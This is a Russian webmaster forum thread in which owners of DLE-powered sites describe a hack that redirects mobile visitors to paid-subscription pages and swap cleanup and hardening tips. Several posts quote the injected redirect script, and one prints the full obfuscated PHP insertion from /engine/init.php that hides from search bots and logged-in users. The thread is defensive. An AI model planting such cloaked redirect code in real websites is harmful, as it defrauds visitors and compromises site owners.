- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Подскажите, где копать? На сайте вставили код, редиректит на мобильные платники:
<script>window.location=("ht"+"tp:"+"//dledle.net/user/id?3&seo"+"ref="+encodeURIComponent(document.referrer)+ "¶"+"meter="+"word&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL));</script>Отображается он только в мобильных браузерах, перед <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML ....
Не могу найти как убрать с сайта эту заразу.
Капайте в файлах, обязательно наткнетесь.
Если перед <!doctype, читайте в прикрепленной теме, я написал способ найти вставку...
Для запрета выполнения скриптв в папках, которые расположены в uploads создаете файлик
.htaccess
прописываете права 444
в файлик добавляете код ниже.
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .wml .ag
Теперь все скрипты и файлы будут выводится в браузер в виде текстовых страничек.
В любые паапки где графика и нте выполнения PHP можно кидать подобный файлик.
Я так несколько сайтов закрыл от шеллов, они просто не работали.
Видимо у всех различные способы, которыми вас взломали.
В каждом случае надо детально просмотреть и найти через что вас взломали.
Смотрите логи и даты изменения файлов.
Могу помочь если сами не знаете, что делать.
и ставьте, ставьте заплатки с dle-news.
не забывайте простейшие правила безопасности, в том числе создавайте для каждого сайта на сервере отдельного пользователя.
полдня сегодня боролся с этой нечистью.
Подскажите, где копать? На сайте вставили код, редиректит на мобильные платники:
<script>window.location=("ht"+"tp:"+"//dledle.net/user/id?3&seo"+"ref="+encodeURIComponent(document.referrer)+ "¶"+"meter="+"word&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL));</script>Отображается он только в мобильных браузерах, перед <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML ....
Не могу найти как убрать с сайта эту заразу.
Вчера три часа убил на поиск и удаление аналогичной ерунды. Нашел ее в файле /engine/init.php.
У меня были две вставки. Первая:
$shka=strrev('eld');Вторая:
$bot = 0; $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); $bots = array('crawl', 'yande', 'googl', 'bot');if( count($bots) ){foreach( $bots as $b ){if( strpos($userAgent, $b) !== FALSE ){$bot = 1; break;}}};
if ( check_smartphone() ) {if (($_SERVER['REQUEST_URI'] != '/') and (!isset ($_COOKIE['dle_user_id'])) and (!$bot))
{echo "<s"."cript>window.loc"."ation=(\"ht\"+\"tp:\"+\"//"."dle".$shka.".net"."/user/id?3&seo\"+\"ref=\"+encodeURIComponent(document.referrer)+ \"¶\"+\"meter=$key\"+\"word&se=$se&ur=1&H"."TT"."P_REF"."ERER=\"+enc"."odeURIComponent(docu"."ment.URL));</s"."cript>";}
if ( @is_dir ( ROOT_DIR . '/templates/smartphone' ) and ( $config['allow_smartphone'] )) {
$config['skin'] = "smartphone";
$smartphone_detected = true;
$config['allow_comments_wysiwyg'] = "no";}}
if (!isset ( $do ) AND isset ($_REQUEST['do']) ) $do = totranslit ( $_REQUEST['do'] ); elseif(isset ( $do )) $do = totranslit ( $do ); else $do = "";
if (!isset ( $subaction ) AND isset ($_REQUEST['subaction']) ) $subaction = totranslit ($_REQUEST['subaction']); else $subaction = totranslit ($subaction);
if ( isset ($_REQUEST['doaction']) ) $doaction = totranslit ($_REQUEST['doaction']); else $doaction = "";
if ($do == "tags" AND !$_GET['tag']) $do = "alltags";
Тому, кто сделал это восхищенно аплодирую. Молодца! Даже имея опыт обнаружения подобных заражений, о его шедевре узнаешь не сразу и обнаруживаешь его с достаточным трудом.
и ставьте, ставьте заплатки с dle-news.
У меня все заплатки были установлены.
Вчера три часа убил на поиск и удаление аналогичной ерунды. Нашел ее в файле /engine/init.php.
Спасибо вам большое! Я бы искал еще дольше, но благодаря вам нашел быстро!🍿
Кстати, У меня тоже все заплатки были установлены. 🙅
Подломали DLE 9.8 в main вставили
Спасибо вам большое! Я бы искал еще дольше, но благодаря вам нашел быстро!🍿
Хостинг виртуалка или VDS? Серверное ПО обновлялось?
На форуме DLE говорят, что ломают как раз через устаревшее программное обеспечение сервера.